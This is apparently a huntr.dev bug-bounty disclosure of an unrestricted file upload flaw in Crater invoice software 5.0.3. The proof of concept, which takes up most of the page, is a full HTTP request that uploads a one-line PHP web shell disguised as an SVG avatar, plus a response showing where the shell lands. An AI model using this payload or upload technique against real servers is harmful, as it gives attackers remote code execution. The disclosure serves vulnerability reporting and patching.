Lucene search

K
huntrTheworstcomradeD7453360-BACA-4E56-985F-481275FA38DB
HistoryDec 03, 2021 - 10:01 p.m.

in crater-invoice/crater

2021-12-0322:01:06
theworstcomrade
www.huntr.dev
7
crater
upload avatar
php
code execution
vulnerability

EPSS

0.001

Percentile

41.1%

Description

In recent Crater version (ed6268aa tag: 5.0.3) lowest privileged user can upload PHP file instead of avatar.

Proof of Concept

POST /api/v1/me/upload-avatar HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6IlBrOE1JS01vcDBqL0hqcXZURTRQMmc9PSIsInZhbHVlIjoiMVVSUVk5N3FmYTh2UG5KSiszSmp3aEg5MXlxSWFMUHRNZFpyME5LRFM3OEpiRWR3dlVCeDJ4a2FYQU9hYmFrZjBmNVBUbGp5UitIY1c3L1JtcWtGaDdoalBXSXU3L2NFS2NMbHZVT3JhNm1zeXdLZllkR2RNVGdKL3NuSWhWblciLCJtYWMiOiI0OTRhMmZkZGFjODA1MWY3ZWQyZmRhY2RhNmRkOTVlNDc0Njg2YzlmY2E2NzkyZjU0ZWExNjBiZjVhZGViMGE2IiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------324661512726686552372889486730
Content-Length: 270
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/admin/settings/account-settings
Cookie: XSRF-TOKEN=eyJpdiI6IlBrOE1JS01vcDBqL0hqcXZURTRQMmc9PSIsInZhbHVlIjoiMVVSUVk5N3FmYTh2UG5KSiszSmp3aEg5MXlxSWFMUHRNZFpyME5LRFM3OEpiRWR3dlVCeDJ4a2FYQU9hYmFrZjBmNVBUbGp5UitIY1c3L1JtcWtGaDdoalBXSXU3L2NFS2NMbHZVT3JhNm1zeXdLZllkR2RNVGdKL3NuSWhWblciLCJtYWMiOiI0OTRhMmZkZGFjODA1MWY3ZWQyZmRhY2RhNmRkOTVlNDc0Njg2YzlmY2E2NzkyZjU0ZWExNjBiZjVhZGViMGE2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im13VlVJa1JyZWs4OWFLWlBBa0JobXc9PSIsInZhbHVlIjoiU21kVnR2Skc1UnZmSnR3SVhiL09qSFBmWGxGV0FMUi9pSzFSTkc2enBZL01GbkJBbCtiMzJmWnNLM3l2OWRJRVk0bUZ2dFRYTkVTWnRQV0xCNnkxbFdIOEJjS1E5N2dwRWNyNC90cHZRSTJaWHozcWNtcmo2RTltY2U0Q1ZEeXQiLCJtYWMiOiJmMzIxYTFiNjU2Y2QyOWM2ZDdiOWJiYzMyYjQ3NWFmZGM3NDU0ZTA0MjNhZjg0ZGEzZDgzZGFlMGEwMjQzMGJmIiwidGFnIjoiIn0%3D; D5zxaxhEVxptcHSFSkkLadY5LtUnr9yDLzGS8IGz=eyJpdiI6Im9jcVpRWkgzTTM2dzZjb3ZsQnlvTnc9PSIsInZhbHVlIjoiWXhGWk9CNlNpQUw2YVNuSWhtekF0TDUwbExybG1jM0tramgzWUlkbVJYa3hCcU1DbnFFbjhwWG5mNGpEU2RsSCtubHBQcXNadDhESDVFU0hZOVRtTFVudmFVRzRtemdMMWpKWm5LZ0JmckJQYnpndE9YQ3p1ZUF4SlRuaWJPWlJCK2hQMjM1QUlEaWo2b28raFh3VTRaN3J4aDdiS3AxSTNtUkJtOE5kT2VqY0d6ejUzZHc2THZhNVNSYVRpcmJ0YWM1L3crdDJSWUU2NlNDb0hUS0xYVWI0anJIOGJWOVIrcFpzWW8yZlF5RnhLZVJ2cFcvUHF6VUZQVkd6MXFtdm9ncWlFTE1QaVBHM1gvR1piVUZnZ0ovR2hFMWhJTUI0cDl5VVdCYUlQNVNKa1VlVGVoVW05dkg1R3pyUUNkRDFtTnBCaCt3UnBqNWpYVGFPN05JeHVGamF5SVJmYVdMdVY1QmRNeHo2R25BWDQ0ay9KRXhxTlZxWnJnYW5hZUdsdk1XeXQ2Mm9wdzJxSmNhbU9OMnNiUVBPaitYQ3F3VzE1amQ5Zm5xbGxuVE1ReUxiaDd4RVNuTkNuUVpyQmpWMldUb1lKNHdXWWJkR3plUjVOcWZKOW91WHhxNG1hMmJqVElMbTR3blJhdFpJalFUTS9mM3UraGZjdDRRL1Ura2c4Wmx2d1piaFRYMmN0Uk1mTFkvVEZRPT0iLCJtYWMiOiJmOGY0NTVmYmUxYTQ4NDI0YzJkN2UxOGM0NzEyZWMwODUwODE4YjllZjM1ZDE4OGMzNDg5NjI1ZDhjYzIwOThiIiwidGFnIjoiIn0%3D

-----------------------------324661512726686552372889486730
Content-Disposition: form-data; name="admin_avatar"; filename="shell.php"
Content-Type: image/svg+xml

<?php print_r(shell_exec($_GET[1])); ?>
-----------------------------324661512726686552372889486730--

In response You can find link to uploaded file in data->avatar

{
    "data":
    {
        "id": 3,
        "name": "user2",
        "email": "[email protected]",
...
        "avatar": "http:\/\/172.17.0.1:8888\/storage\/4\/shell.php",
        "is_owner": false,
...
    }
}

Impact

This vulnerability is high and leads to code execution

EPSS

0.001

Percentile

41.1%

Related for D7453360-BACA-4E56-985F-481275FA38DB